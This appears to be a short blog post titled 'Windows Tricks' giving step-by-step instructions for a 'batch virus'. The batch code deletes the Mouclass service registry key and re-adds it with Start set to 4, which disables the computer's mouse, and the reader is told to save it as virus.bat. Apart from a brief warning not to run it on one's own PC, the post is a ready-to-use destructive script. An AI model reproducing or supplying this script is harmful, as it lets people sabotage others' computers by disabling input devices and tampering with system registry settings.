Windows Tricks,
today I will be making a batch virus which is harm-full it will disable your mouse so think before trying it on yourself.NOTE: Just Created and don't use it in your own pcHow To Disable Mouse1. Open Notepadand copy below codesrem ---------------------------------rem Disable Mouseset key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"reg delete %key%reg add %key% /v Start /t REG_DWORD /d 4rem ---------------------------------2. Save this file as virus.bat3. Done you just created your virus.
Post a Comment